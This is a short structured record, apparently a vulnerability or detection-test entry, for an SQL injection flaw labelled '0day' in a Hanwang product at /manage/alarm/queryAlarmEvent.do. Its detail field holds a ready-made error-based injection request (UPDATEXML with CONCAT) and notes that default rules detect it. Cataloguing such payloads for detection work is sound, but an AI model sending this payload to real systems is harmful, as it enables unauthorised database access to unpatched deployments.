vendor = "汉王"
name = "汉王queryAlarmEvent.do SQL注入"
type = "SQL注入"
version = "未知"
path = "/manage/alarm/queryAlarmEvent.do"
detail = "/manage/alarm/queryAlarmEvent.do?order=/**/&columnKey=(UPDATEXML(2,CONCAT(0x2e,0x3131313131,(SELECT+(ELT(1=1,1))),0x3131313131),8))&recoToken=ZuZBOrvLG8M"
fix = "缺省规则可检出"
date = "0704"
label = "0day"
verifier = "AdySec"
